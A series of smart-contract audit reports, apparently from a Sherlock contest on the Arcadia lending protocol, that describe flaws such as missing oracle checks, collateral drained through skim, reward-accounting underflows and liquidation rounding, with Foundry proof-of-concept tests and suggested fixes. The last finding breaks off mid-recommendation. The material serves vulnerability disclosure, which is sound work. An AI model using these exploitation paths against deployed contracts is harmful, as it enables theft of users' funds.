The function Registry::getRateInUsd is external and can be called by anyone including users.

    function getRateInUsd(bytes32 oracleSequence) external view returns (uint256 rate) {
        (bool[] memory baseToQuoteAsset, uint256[] memory oracles) = oracleSequence.unpack();

        rate = 1e18;

        uint256 length = oracles.length;
        for (uint256 i; i < length; ++i) {
            // Each Oracle has a fixed base asset and quote asset.
            // The oracle-rate expresses how much tokens of the quote asset (18 decimals precision) are required
            // to buy 1 token of the BaseAsset.
            if (baseToQuoteAsset[i]) {
                // "Normal direction" (how much of the QuoteAsset is required to buy 1 token of the BaseAsset).
                // -> Multiply with the oracle-rate.
                rate = rate.mulDivDown(IOracleModule(oracleToOracleModule[oracles[i]]).getRate(oracles[i]), 1e18);
            } else {
                // "Inverse direction" (how much of the BaseAsset is required to buy 1 token of the QuoteAsset).
                // -> Divide by the oracle-rate.
                rate = rate.mulDivDown(1e18, IOracleModule(oracleToOracleModule[oracles[i]]).getRate(oracles[i]));
            }
        }
    }

However, the function doesn't call checkOracleSequence to perform the check to ensure the following criteria:

  • The oracle must be previously added to the Registry and must still be active.
  • The last Asset of oracles (except for the last oracle) must be equal to the first asset of the next oracle.
  • The last Asset of the last oracle must be USD.

The function just unpacks the oracleSequence and performs the multiplications without any checks or reverts. If any of the above criteria are not met, the returned value will be incorrect: the input oracles may not be registered, the sequence may not be valid, and the last asset may not be USD, all leading to an incorrect rate.

Impact

Registry::getRateInUsd can be called by anyone but it lacks a check of the input oracleSequence. Thus, the input oracle may not be registered, the sequence may not be valid, and even the last asset may not be USD, all leading to an incorrect return value of rate.

Code Snippet

Registry::getRateInUsd

    function getRateInUsd(bytes32 oracleSequence) external view returns (uint256 rate) {
        (bool[] memory baseToQuoteAsset, uint256[] memory oracles) = oracleSequence.unpack();

        rate = 1e18;

        uint256 length = oracles.length;
        for (uint256 i; i < length; ++i) {
            // Each Oracle has a fixed base asset and quote asset.
            // The oracle-rate expresses how much tokens of the quote asset (18 decimals precision) are required
            // to buy 1 token of the BaseAsset.
            if (baseToQuoteAsset[i]) {
                // "Normal direction" (how much of the QuoteAsset is required to buy 1 token of the BaseAsset).
                // -> Multiply with the oracle-rate.
                rate = rate.mulDivDown(IOracleModule(oracleToOracleModule[oracles[i]]).getRate(oracles[i]), 1e18);
            } else {
                // "Inverse direction" (how much of the BaseAsset is required to buy 1 token of the QuoteAsset).
                // -> Divide by the oracle-rate.
                rate = rate.mulDivDown(1e18, IOracleModule(oracleToOracleModule[oracles[i]]).getRate(oracles[i]));
            }
        }
    }

Registry::checkOracleSequence

     * - The oracle must be previously added to the Registry and must still be active.
     * - The last Asset of oracles (except for the last oracle) must be equal to the first asset of the next oracle.
     * - The last Asset of the last oracle must be USD.

Tool used

Manual Review, VSCode

Recommendation

Add require(checkOracleSequence(oracleSequence),"bad oracle sequence"); in the function to ensure the input is checked by default.

AgileJune - AbstractStakingAM.sol: increaseLiquidity() and mint() revert on every call except the first

AgileJune

high

AbstractStakingAM.sol: increaseLiquidity() and mint() revert on every call except the first

Summary

AbstractStakingAM.sol: increaseLiquidity() and mint() revert on every call except the first when staking a non-standard ERC20 token like USDT.

Vulnerability Detail

AbstractStakingAM.sol: increaseLiquidity() and mint() invoke _stake(), which calls approve().
The first approve() sets the allowance.
From the second call of _stake() onwards, some token contracts (such as USDT) revert the transaction because the previous allowance is not zero.

Impact

Users cannot stake additional amounts of the asset; only the first stake succeeds.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/asset-modules/Stargate-Finance/StakedStargateAM.sol#L83
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/asset-modules/abstracts/AbstractStakingAM.sol#L285
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/asset-modules/abstracts/AbstractStakingAM.sol#L314
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/asset-modules/abstracts/AbstractStakingAM.sol#L327
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/asset-modules/abstracts/AbstractStakingAM.sol#L351

Tool used

Manual Review

Recommendation

Set the allowance to 0 before approving the new amount:

ERC20(asset).approve(address(LP_STAKING_TIME), 0);
ERC20(asset).approve(address(LP_STAKING_TIME), amount);
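Alternatively (a sketch under the assumption that OpenZeppelin's SafeERC20 >= 4.9 is added as a dependency; the project currently uses solmate), forceApprove resets the allowance to zero automatically when a token such as USDT requires it:

// Inside _stake(), replacing the plain approve call; requires OpenZeppelin's SafeERC20 (assumed dependency).
IERC20(asset).forceApprove(address(LP_STAKING_TIME), amount);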

KiroBrejka - [H-1] - User can create multiple accounts and use the minted NFTs as collateral

KiroBrejka

high

[H-1] - User can create multiple accounts and use the minted NFTs as collateral

Summary

A malicious user can create multiple accounts and then deposit all of the minted NFTs into one main margin account and use them as collateral.

Vulnerability Detail

It will essentially be free for the user to create multiple margin accounts by using the Factory::createAccount() function. After creating those accounts, they can deposit the minted NFTs into one main margin account and use them as practically free collateral to obtain margin from the creditor.

Impact

The malicious user can obtain margin for free, so they do not care about being liquidated because they lose nothing. The other created accounts are practically useless, so they do not care what happens to them either.

Code Snippet

Creation of an Arcadia Account:
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/Factory.sol?plain=1#L84-L101

Deposit into Arcadia Account:
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/accounts/AccountV1.sol?plain=1#L818-L826
https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/accounts/AccountV1.sol?plain=1#L835-L866

Tool used

Manual Review

Recommendation

Check whether a user already has an account and, if so, revert in Factory::createAccount(), or make the function payable so that minting multiple accounts is no longer worthwhile. A sketch of the first option follows.
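A minimal sketch of the first option (not the project's code); the hasAccount mapping, the error name, and the createAccount signature shown here are assumptions:

    // Hypothetical tracking of one-account-per-address inside the Factory.
    mapping(address => bool) internal hasAccount;

    error AccountAlreadyExists();

    function createAccount(uint256 salt, uint256 accountVersion, address creditor) external returns (address account) {
        if (hasAccount[msg.sender]) revert AccountAlreadyExists();
        hasAccount[msg.sender] = true;

        // ...existing proxy deployment, initialization and mint logic...
    }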

0xVolodya - Sometimes an account will be liquidatable but the liquidator will not be able to start its liquidation

0xVolodya

medium

Sometimes an account will be liquidatable but the liquidator will not be able to start its liquidation

Summary

Let's look at how isAccountLiquidatable in the Account contract works: it first applies _calculateLiquidationValue and then _convertValueInUsdToValueInNumeraire to that number.

    function getLiquidationValue(
        address numeraire,
        address creditor,
        address[] calldata assetAddresses,
        uint256[] calldata assetIds,
        uint256[] calldata assetAmounts
    ) external view sequencerNotDown(creditor) returns (uint256 liquidationValue) {
        AssetValueAndRiskFactors[] memory valuesAndRiskFactors =
            getValuesInUsd(creditor, assetAddresses, assetIds, assetAmounts);

        // Calculate the "liquidationValue" in USD with 18 decimals precision.
        liquidationValue = valuesAndRiskFactors._calculateLiquidationValue();

        // Convert the USD-value to the value in Numeraire if the Numeraire is different from USD (0-address).
        if (numeraire != address(0)) {
            liquidationValue = _convertValueInUsdToValueInNumeraire(numeraire, liquidationValue);
        }
    }

Registry.sol#L784
In startLiquidation the order is reversed: _convertValueInUsdToValueInNumeraire is applied first and _calculateLiquidationValue afterwards.

    function startLiquidation(address initiator)
        external
        onlyLiquidator
        nonReentrant
        updateActionTimestamp
        returns (
            address[] memory assetAddresses,
            uint256[] memory assetIds,
            uint256[] memory assetAmounts,
            address creditor_,
            uint96 minimumMargin_,
            uint256 openPosition,
            AssetValueAndRiskFactors[] memory assetAndRiskValues
        )
    {
        assetAndRiskValues =
            IRegistry(registry).getValuesInNumeraire(numeraire, creditor_, assetAddresses, assetIds, assetAmounts);
....
        if (openPosition == 0 || assetAndRiskValues._calculateLiquidationValue() >= usedMargin) {
            revert AccountErrors.AccountNotLiquidatable();
        }
    }

Vulnerability Detail

Due to rounding, the liquidation value computed via isAccountLiquidatable can be usedMargin - 1 while the value computed inside startLiquidation equals usedMargin, so the account appears liquidatable yet startLiquidation reverts.

Impact

Code Snippet

POC

    function testFuzz_startLiquidation_same_isAccountLiquidatable(
        uint32 gracePeriod,
        uint32 assetAmounts0,
        uint32 assetAmounts1,
        uint32 assetAmounts2,
        uint32 startedAt,
        uint32 currentTime
    ) public {
        // Given: startedAt does not underflow.
        // And: oracle staleness-check does not underflow.
        currentTime = uint32(bound(currentTime, 2 days, type(uint32).max));
        vm.warp(currentTime);

        // And: Oracles are not stale.
        vm.startPrank(users.defaultTransmitter);
        mockOracles.stable1ToUsd.transmit(int256(rates.stable1ToUsd));
        mockOracles.token1ToUsd.transmit(int256(rates.token1ToUsd));
        mockOracles.nft1ToToken1.transmit(int256(rates.nft1ToToken1));
        vm.stopPrank();

        // And: Sequencer is online.
        startedAt = uint32(bound(startedAt, 0, currentTime));
        sequencerUptimeOracle.setLatestRoundData(0, startedAt);

        // And: Grace period did pass.
        gracePeriod = uint32(bound(gracePeriod, 0, currentTime - startedAt));
        vm.prank(creditorUsd.riskManager());
        registryExtension.setRiskParameters(address(creditorUsd), 0, gracePeriod, type(uint64).max);

        address[] memory assetAddresses = new address[](3);
        assetAddresses[0] = address(mockERC20.stable1);
        assetAddresses[1] = address(mockERC20.token1);
        assetAddresses[2] = address(mockERC721.nft1);

        uint256[] memory assetIds = new uint256[](3);
        assetIds[0] = 0;
        assetIds[1] = 0;
        assetIds[2] = 1;

        uint256[] memory assetAmounts = new uint256[](3);
        assetAmounts[0] = assetAmounts0;
        assetAmounts[1] = assetAmounts1;
        assetAmounts[2] = assetAmounts2;


        AssetValueAndRiskFactors[] memory actualValuesPerAsset = registryExtension.getValuesInNumeraire(
            address(mockERC20.token1), address(creditorUsd), assetAddresses, assetIds, assetAmounts
        );
        uint compareNumber = actualValuesPerAsset._calculateLiquidationValue();

        uint compareNumber2 = registryExtension.getLiquidationValue(
            address(mockERC20.token1), address(creditorUsd), assetAddresses, assetIds, assetAmounts
        );

        assertEq(compareNumber, compareNumber2);
    }

Tool used

Manual Review

Recommendation

Use the same calculation order in both code paths (convert to the Numeraire and apply the liquidation factors in the same sequence) so the two values always match.

0xVolodya - Account in some cases will become liquidatable after an upgrade

0xVolodya

high

Account in some cases will become liquidatable after an upgrade

Summary

Two different Registries can have different minUsdValue risk parameters. Assets whose value is above minUsdValue1 (old Registry) but below minUsdValue2 (new Registry) will no longer count toward the total collateral value of the account. The account's getCollateralValue therefore decreases, so an account can become liquidatable right after an upgrade.

Vulnerability Detail

    function getValuesInUsd(
        address creditor,
        address[] calldata assets,
        uint256[] calldata assetIds,
        uint256[] calldata assetAmounts
    ) public view sequencerNotDown(creditor) returns (AssetValueAndRiskFactors[] memory valuesAndRiskFactors) {
        uint256 length = assets.length;
        valuesAndRiskFactors = new AssetValueAndRiskFactors[](length);

        uint256 minUsdValue = riskParams[creditor].minUsdValue;
        for (uint256 i; i < length; ++i) {
            (
                valuesAndRiskFactors[i].assetValue,
                valuesAndRiskFactors[i].collateralFactor,
                valuesAndRiskFactors[i].liquidationFactor
            ) = IAssetModule(assetToAssetModule[assets[i]]).getValue(creditor, assets[i], assetIds[i], assetAmounts[i]);
            // If asset value is too low, set to zero.
            // This is done to prevent dust attacks which may make liquidations unprofitable.
            if (valuesAndRiskFactors[i].assetValue < minUsdValue) valuesAndRiskFactors[i].assetValue = 0;
        }
    }

src/Registry.sol#L663

Impact

Code Snippet

Tool used

Manual Review

Recommendation

Add a health check at the end of the upgrade:

    function upgradeAccount(address newImplementation, address newRegistry, uint256 newVersion, bytes calldata data)
        external
        onlyFactory
        nonReentrant
        notDuringAuction
        updateActionTimestamp
    {
        // Cache old parameters.
        address oldImplementation = _getAddressSlot(IMPLEMENTATION_SLOT).value;
        address oldRegistry = registry;
        uint256 oldVersion = ACCOUNT_VERSION;

        // Store new parameters.
        _getAddressSlot(IMPLEMENTATION_SLOT).value = newImplementation;
        registry = newRegistry;

        // Prevent that Account is upgraded to a new version where the Numeraire can't be priced.
        if (newRegistry != oldRegistry && !IRegistry(newRegistry).inRegistry(numeraire)) {
            revert AccountErrors.InvalidRegistry();
        }

        // If a Creditor is set, new version should be compatible.
        if (creditor != address(0)) {
            (bool success,,,) = ICreditor(creditor).openMarginAccount(newVersion);
            if (!success) revert AccountErrors.InvalidAccountVersion();
        }

        // Hook on the new logic to finalize upgrade.
        // Used to eg. Remove exposure from old Registry and add exposure to the new Registry.
        // Extra data can be added by the Factory for complex instructions.
        this.upgradeHook(oldImplementation, oldRegistry, oldVersion, data);

        // Event emitted by Factory.
+        if (isAccountUnhealthy()) revert AccountErrors.AccountUnhealthy();
    }

jesjupyer - `assetToInformation` is never initialized in `PrimaryAM`, causing `setOracles` always fail due to `Min1Oracle`

jesjupyer

high

assetToInformation is never initialized in PrimaryAM, causing setOracles always fail due to Min1Oracle

Summary

In the PrimaryAM contract, the variable assetToInformation is defined to store the asset information, but it is never initialized anywhere in the contract. Thus, when setOracles is called, empty bytes are read as oldOracles and passed to IRegistry(REGISTRY).checkOracleSequence(oldOracles). Since empty bytes always revert with Min1Oracle, setOracles will always fail.

Vulnerability Detail

In the PrimaryAM contract, the variable assetToInformation is defined to store the assetInformation.

    mapping(bytes32 assetKey => AssetInformation) public assetToInformation;

But there is only in setOracles that the assetToInformation is ever set.

    function setOracles(address asset, uint256 assetId, bytes32 newOracles) external onlyOwner {
        bytes32 assetKey = _getKeyFromAsset(asset, assetId);

        // At least one of the old oracles must be inactive before a new sequence can be set.
        bytes32 oldOracles = assetToInformation[assetKey].oracleSequence;
        if (IRegistry(REGISTRY).checkOracleSequence(oldOracles)) revert OracleStillActive();

        // The new oracle sequence must be correct.
        if (!IRegistry(REGISTRY).checkOracleSequence(newOracles)) revert BadOracleSequence();

        assetToInformation[assetKey].oracleSequence = newOracles;
    }

So, in the statement IRegistry(REGISTRY).checkOracleSequence(oldOracles), the oldOracles will be assetToInformation[assetKey].oracleSequence which are empty.

In the Registry::checkOracleSequence, empty bytes will revert due to Min1Oracle.

    function checkOracleSequence(bytes32 oracleSequence) external view returns (bool) {
        (bool[] memory baseToQuoteAsset, uint256[] memory oracles) = oracleSequence.unpack();
        uint256 length = oracles.length;
        if (length == 0) revert RegistryErrors.Min1Oracle();
        ...
    }

Unless a function is defined to explicitly initialize the asset information, any call to setOracles will always fail, and no documentation or comment mentions this.

It should be noted that in the mock file PrimaryAMMock, a function setAssetInformation is added, and should be called before setOracles.

    function setAssetInformation(address asset, uint256 assetId, uint64 assetUnit, bytes32 oracles) public {
        bytes32 assetKey = _getKeyFromAsset(asset, assetId);
        assetToInformation[assetKey].assetUnit = assetUnit;
        assetToInformation[assetKey].oracleSequence = oracles;
    }

For the same reason, the function PrimaryAM::getValue will also fail.

In production, a setAssetInformation-like function should be defined in PrimaryAM itself, since the contract is expected to work once all of its interfaces are implemented. Patching the mock in the test files does not make the contract itself bug-free; anyone who extends PrimaryAM without realizing this issue will suffer a DoS.

Here is the PoC. Add it in SetOracles.fuzz.t.sol

    function testFuzz_fail_setOracles(
        address asset,
        uint96 assetId,
        uint256 lengthOld,
        bool[3] memory directionsOld,
        uint80[3] memory oraclesOld,
        uint256 lengthNew,
        bool[3] memory directionsNew,
        uint80[3] memory oraclesNew
    ) public {
        // Add the old oracles and set the oracle sequence for the asset.
        lengthOld = bound(lengthOld, 1, 3);
        addOracles(lengthOld, directionsOld, oraclesOld);
        
        // And one of the old oracles is not active anymore.
        lengthNew = bound(lengthNew, 1, 3);
        for (uint256 i; i < lengthNew; ++i) {
            vm.assume(oraclesOld[0] != oraclesNew[i]);
        }
        oracleModule.setIsActive(oraclesOld[0], false);

        // Add the new oracles.
        addOracles(lengthNew, directionsNew, oraclesNew);
        bytes32 oracleSequenceNew = getOracleSequence(lengthNew, directionsNew, oraclesNew);

        vm.prank(users.creatorAddress);
        vm.expectRevert();
        assetModule.setOracles(asset, assetId, oracleSequenceNew);

    } 

It can be seen that empty bytes are used, and the transaction is reverted.

Impact

Empty bytes are regarded as oldOracles and cause a revert with Min1Oracle, so setOracles will always fail, resulting in a DoS of the contract's functionality.

Code Snippet

PrimaryAM::assetToInformation

    mapping(bytes32 assetKey => AssetInformation) public assetToInformation;

PrimaryAM::setOracles

    function setOracles(address asset, uint256 assetId, bytes32 newOracles) external onlyOwner {
        bytes32 assetKey = _getKeyFromAsset(asset, assetId);

        // At least one of the old oracles must be inactive before a new sequence can be set.
        bytes32 oldOracles = assetToInformation[assetKey].oracleSequence;
        if (IRegistry(REGISTRY).checkOracleSequence(oldOracles)) revert OracleStillActive();

        // The new oracle sequence must be correct.
        if (!IRegistry(REGISTRY).checkOracleSequence(newOracles)) revert BadOracleSequence();

        assetToInformation[assetKey].oracleSequence = newOracles;
    }

Registry::checkOracleSequence

    function checkOracleSequence(bytes32 oracleSequence) external view returns (bool) {
        (bool[] memory baseToQuoteAsset, uint256[] memory oracles) = oracleSequence.unpack();
        uint256 length = oracles.length;
        if (length == 0) revert RegistryErrors.Min1Oracle();
        ...
    }

Tool used

Foundry

Recommendation

Add a function like setAssetInformation to initialize the asset information directly in the PrimaryAM contract, or modify the code so that empty bytes are never passed to checkOracleSequence, as in the sketch below.
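A minimal sketch of the second option (not the project's code): skip the "old oracle still active" check when no sequence has ever been set, so the first call to setOracles can initialize assetToInformation:

    function setOracles(address asset, uint256 assetId, bytes32 newOracles) external onlyOwner {
        bytes32 assetKey = _getKeyFromAsset(asset, assetId);

        // Only enforce the "old oracle must be inactive" rule when a sequence was previously set.
        bytes32 oldOracles = assetToInformation[assetKey].oracleSequence;
        if (oldOracles != bytes32(0)) {
            if (IRegistry(REGISTRY).checkOracleSequence(oldOracles)) revert OracleStillActive();
        }

        // The new oracle sequence must be correct.
        if (!IRegistry(REGISTRY).checkOracleSequence(newOracles)) revert BadOracleSequence();

        assetToInformation[assetKey].oracleSequence = newOracles;
    }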

jesjupyer - The owner can bypass the `notDuringAuction` and `isAccountUnhealthy` checks and drain some collateral tokens using `skim`

jesjupyer

high

The owner can bypass the notDuringAuction and isAccountUnhealthy checks and drain some collateral tokens using skim

Summary

The function AccountV1::skim lets the owner skim non-deposited assets from the Account. Because skimmed amounts are not counted as collateral, the function performs neither a notDuringAuction nor an isAccountUnhealthy check. However, if a collateral token has multiple addresses/entry points (like TrueUSD), the owner can call skim with the secondary address as token and drain the corresponding collateral balance, bypassing both checks.

Vulnerability Detail

In the function AccountV1::skim, non-deposited assets are returned to the owner.

        if (type_ == 0) {
            uint256 balance = ERC20(token).balanceOf(address(this));
            uint256 balanceStored = erc20Balances[token];
            if (balance > balanceStored) {
                ERC20(token).safeTransfer(msg.sender, balance - balanceStored);
            }
        }

Since these assets are not counted as collateral, the function performs neither a notDuringAuction nor an isAccountUnhealthy check.

    function skim(address token, uint256 id, uint256 type_) public onlyOwner nonReentrant updateActionTimestamp {
    ...
    }

However, some ERC20 tokens (like TrueUSD) have multiple addresses/entry points, all pointing to the same underlying balance. If such a token is used as collateral, calling skim with the secondary entry point reads the full ERC20(token).balanceOf(address(this)) while erc20Balances[token] for that address is zero, so the original collateral balance can be transferred out by the owner.

This could happen while the account is being liquidated, when the owner cannot withdraw because of the notDuringAuction check. Also, if the owner is tricked into doing this, their account may end up in an unhealthy state without the isAccountUnhealthy check and could be liquidated.

Impact

If a token with multiple addresses/entry points is used as collateral, calling skim with the secondary entry point reads a balanceOf(address(this)) that differs from erc20Balances[token], so the original collateral can be drained by the owner.

If the account is being liquidated and the owner cannot withdraw because of the notDuringAuction check, the owner can use this to drain tokens from the account.

Also, if the owner is tricked into doing this, their account may end up in an unhealthy state without the isAccountUnhealthy check and could be liquidated.

Code Snippet

AccountV1::skim

    function skim(address token, uint256 id, uint256 type_) public onlyOwner nonReentrant updateActionTimestamp {
        if (token == address(0)) {
            (bool success, bytes memory result) = payable(msg.sender).call{ value: address(this).balance }("");
            require(success, string(result));
            return;
        }

        if (type_ == 0) {
            uint256 balance = ERC20(token).balanceOf(address(this));
            uint256 balanceStored = erc20Balances[token];
            if (balance > balanceStored) {
                ERC20(token).safeTransfer(msg.sender, balance - balanceStored);
            }
        } else if (type_ == 1) {
            bool isStored;
            uint256 erc721StoredLength = erc721Stored.length;
            for (uint256 i; i < erc721StoredLength; ++i) {
                if (erc721Stored[i] == token && erc721TokenIds[i] == id) {
                    isStored = true;
                    break;
                }
            }

            if (!isStored) {
                IERC721(token).safeTransferFrom(address(this), msg.sender, id);
            }
        } else if (type_ == 2) {
            uint256 balance = IERC1155(token).balanceOf(address(this), id);
            uint256 balanceStored = erc1155Balances[token][id];

            if (balance > balanceStored) {
                IERC1155(token).safeTransferFrom(address(this), msg.sender, id, balance - balanceStored, "");
            }
        }
    }

Tool used

Manual Review, VSCode

Recommendation

Add a check ensuring that getCollateralValue() before and after the skim is unchanged; a sketch follows.
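A minimal sketch of the suggested invariant (not the project's code); the error name is hypothetical and the check assumes getCollateralValue() is acceptable to call twice:

    function skim(address token, uint256 id, uint256 type_) public onlyOwner nonReentrant updateActionTimestamp {
        uint256 collateralValueBefore = getCollateralValue();

        // ...existing skim logic for native ETH, ERC20, ERC721 and ERC1155...

        // Skimming must never change the value backing the open position.
        if (getCollateralValue() != collateralValueBefore) revert AccountErrors.CollateralValueChanged(); // hypothetical error
    }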

matejdb - createAccount function on Factory contract is calling _mint instead of _safeMint when minting account NFTs

matejdb

medium

createAccount function on Factory contract is calling _mint instead of _safeMint when minting account NFTs

Summary

The createAccount function on the Factory contract should call _safeMint instead of _mint when minting new account NFTs.

Vulnerability Detail

The usage of _safeMint guarantees that the receiving to address is either a smart contract that implements IERC721Receiver.onERC721Received or an EOA.

Impact

The token (i.e. the account NFT) can get stuck in a contract that does not implement the receiver interface.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/main/accounts-v2/src/Factory.sol#L105C1-L105C47

Tool used

Manual Review

Recommendation

Use _safeMint() instead of _mint() for the ERC721 mint in the createAccount function, as sketched below.
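A minimal diff-style sketch (not the project's code); the recipient and token id variable names are assumptions about what Factory.createAccount mints:

- _mint(msg.sender, newAccountId);
+ _safeMint(msg.sender, newAccountId);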

rvierdiiev - AbstractStakingAM allows the owner of a position NFT to withdraw its balance before selling the NFT

rvierdiiev

high

AbstractStakingAM allows the owner of a position NFT to withdraw its balance before selling the NFT

Summary

AbstractStakingAM allows the owner of a position NFT to withdraw its balance right before selling the NFT, because no restriction exists inside the module.

Vulnerability Detail

When a user stakes LP tokens in the AbstractStakingAM, an ERC721 token is minted for them. The user can later do whatever they want with this ERC721 token, so it is possible that such tokens will be traded on marketplaces.

AbstractStakingAM.decreaseLiquidity decreases the position balance behind the NFT. Currently there is no guarantee for a purchaser that they will receive an NFT with the LP amount they intended to buy, since the NFT owner can withdraw almost the whole position right before the order is filled on the NFT marketplace.

Impact

The NFT purchaser can receive less LP than expected.

Code Snippet

Provided above

Tool used

Manual Review

Recommendation

The Account contract already implements protection via the lastActionTimestamp variable; the same cool-down can be reused here. Alternatively, allow StakingAM.mint to be used only for collateral: the function would send the token to the Account directly after creation, and withdrawing it from the Account would fully unstake the position. A sketch of the cool-down option follows.
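A minimal sketch of the cool-down option (not the project's code); the mapping, constant, error name, and decreaseLiquidity signature are assumptions:

    // Hypothetical per-position cool-down, mirroring the Account's lastActionTimestamp protection.
    mapping(uint256 position => uint256 timestamp) internal lastPositionAction;
    uint256 internal constant COOL_DOWN_PERIOD = 5 minutes;

    error CoolDownPeriodNotPassed();

    function decreaseLiquidity(uint256 positionId, uint128 amount) external virtual {
        if (block.timestamp <= lastPositionAction[positionId] + COOL_DOWN_PERIOD) revert CoolDownPeriodNotPassed();
        lastPositionAction[positionId] = block.timestamp;

        // ...existing unstake, reward accounting and transfer logic...
    }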

zzykxx - Stargate `STG` rewards are accounted incorrectly by `StakedStargateAM.sol`

zzykxx

high

Stargate STG rewards are accounted incorrectly by StakedStargateAM.sol

Summary

The Stargate LP_STAKING_TIME contract clears and sends rewards to the caller every time deposit() is called, but StakedStargateAM does not take this into account.

Vulnerability Detail

When either mint() or increaseLiquidity() is called, the assetState[asset].lastRewardGlobal variable is not reset to 0 even though the rewards have been transferred and accounted for on Stargate's side.

After a call to mint() or increaseLiquidity(), any subsequent call to mint(), increaseLiquidity(), burn(), decreaseLiquidity(), claimRewards() or rewardOf(), all of which internally call _getRewardBalances(), will either revert with an underflow or account for fewer rewards than it should, because assetState_.lastRewardGlobal has not been reset to 0 while currentRewardGlobal (which is fetched from Stargate) has:

uint256 currentRewardGlobal = _getCurrentReward(positionState_.asset);
uint256 deltaReward = currentRewardGlobal - assetState_.lastRewardGlobal; ❌
function _getCurrentReward(address asset) internal view override returns (uint256 currentReward) {
    currentReward = LP_STAKING_TIME.pendingEmissionToken(assetToPid[asset], address(this));
}

POC

To copy-paste in USDbCPool.fork.t.sol:

function testFork_WrongRewards() public {
    uint256 initBalance = 1000 * 10 ** USDbC.decimals();
    // Given : A user deposits in the Stargate USDbC pool, in exchange of an LP token.
    vm.startPrank(users.accountOwner);
    deal(address(USDbC), users.accountOwner, initBalance);

    USDbC.approve(address(router), initBalance);
    router.addLiquidity(poolId, initBalance, users.accountOwner);
    // assert(ERC20(address(pool)).balanceOf(users.accountOwner) > 0);

    // And : The user stakes the LP token via the StargateAssetModule
    uint256 stakedAmount = ERC20(address(pool)).balanceOf(users.accountOwner);
    ERC20(address(pool)).approve(address(stakedStargateAM), stakedAmount);
    uint256 tokenId = stakedStargateAM.mint(address(pool), uint128(stakedAmount) / 4);

    //We let 10 days pass to accumulate rewards.
    vm.warp(block.timestamp + 10 days);

    // User increases liquidity of the position.
    uint256 initialRewards = stakedStargateAM.rewardOf(tokenId);
    stakedStargateAM.increaseLiquidity(tokenId, 1);

    vm.expectRevert();
    stakedStargateAM.burn(tokenId); //❌ User can't call burn because of underflow

    //We let 10 days pass, this accumulates enough rewards for the call to burn to succeed
    vm.warp(block.timestamp + 10 days);
    uint256 currentRewards = stakedStargateAM.rewardOf(tokenId);
    stakedStargateAM.burn(tokenId);

    assert(currentRewards - initialRewards < 1e10); //❌ User gets less rewards than he should. The rewards of the 10 days the user couldn't withdraw his position are basically zeroed out.
    vm.stopPrank();
}

Impact

Users will not be able to take any action on their positions until currentRewardGlobal is greater than or equal to assetState_.lastRewardGlobal. After that they will be able to perform actions, but their positions will account for fewer rewards than they should, because a total amount of assetState_.lastRewardGlobal rewards is nullified.

This will also DOS the whole lending/borrowing system if an Arcadia Stargate position is used as collateral because rewardOf(), which is called to estimate the collateral value, also reverts.

Code Snippet

Tool used

Manual Review

Recommendation

Reset assetState[asset].lastRewardGlobal correctly, or, since every action (mint(), burn(), increaseLiquidity(), decreaseLiquidity(), claimReward()) has the effect of withdrawing all current rewards, change _getRewardBalances() to use the amount returned by _getCurrentReward() directly as deltaReward:

uint256 deltaReward = _getCurrentReward(positionState_.asset);

0xrice.cooker - Unhappy liquidation flow does not check whether the debt owner has any unwithdrawn surplus amount stored in the LendingPool

0xrice.cooker

medium

Unhappy liquidation flow does not check whether the debt owner has any unwithdrawn surplus amount stored in the LendingPool

Summary

The unhappy liquidation flow does not check the debt owner's realisedLiquidityOf[debt owner] balance stored in the LendingPool; instead it decreases the tranches' liquidity to pay back the bad debt.

Vulnerability Detail

The mapping(address => uint256) internal realisedLiquidityOf variable is mostly used to distribute liquidity to the LendingPool's tranches and treasury. It is also credited to regular users in these cases:
- The reward to the initiator who calls startLiquidation()
- The reward to the terminator who settles the auction
- The surplus amount sent to the debt owner when the terminator overbids in the happy flow

Afterwards, a regular user can withdraw these assets using withdrawFromLendingPool().

Note that the surplus amount received by the debt owner is not used to offset new debt when that owner gets liquidated again. When things go wrong, the new debt goes through the unhappy flow and tranche liquidity has to be decreased to cover the bad debt; as a result, stakers in the junior tranche lose part of their profits.
The impact of bad debt could be reduced by checking whether the debt owner's realisedLiquidityOf[debt owner] holds any unclaimed assets that can be used to pay back the debt.

Impact

This leaves the protocol's tranches more vulnerable to bad debt.

Code Snippet

https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/LendingPool.sol#L938C1-L966C6
https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/LendingPool.sol#L372C1-L385C6
https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/LendingPool.sol#L983C1-L1031C6

Tool used

Manual Review

Recommendation

Step 1: in the happy flow, send the surplus amount to the debt account instead of the debt owner, which makes steps 2 and 3 easier.
Step 2: restrict withdrawFromLendingPool() for borrowers with outstanding debt; an account's balance can only be withdrawn once it has no debt left in that particular LendingPool.
Step 3: implement the deduction logic in settleLiquidationUnhappyFlow().

Here is my fix; note that it is untested and may contain bugs:
Step 1: https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/LendingPool.sol#L938C1-L966C6

    function _settleLiquidationHappyFlow(
        address account,
        uint256 startDebt,
        uint256 minimumMargin_,
        address terminator,
        uint256 surplus
    ) internal {
        (uint256 initiationReward, uint256 terminationReward, uint256 liquidationPenalty) =
            _calculateRewards(startDebt, minimumMargin_);

        _syncLiquidationFee(liquidationPenalty);

        totalRealisedLiquidity =
            SafeCastLib.safeCastTo128(totalRealisedLiquidity + terminationReward + liquidationPenalty + surplus);

        unchecked {
-           if (surplus > 0) realisedLiquidityOf[IAccount(account).owner()] += surplus;
+           if (surplus > 0) realisedLiquidityOf[account] += surplus;
            realisedLiquidityOf[terminator] += terminationReward;
        }

        _endLiquidation();
    }

Step 2: https://github.com/sherlock-audit/2023-12-arcadia/blob/de7289bebb3729505a2462aa044b3960d8926d78/lending-v2/src/LendingPool.sol#L372C1-L385C6

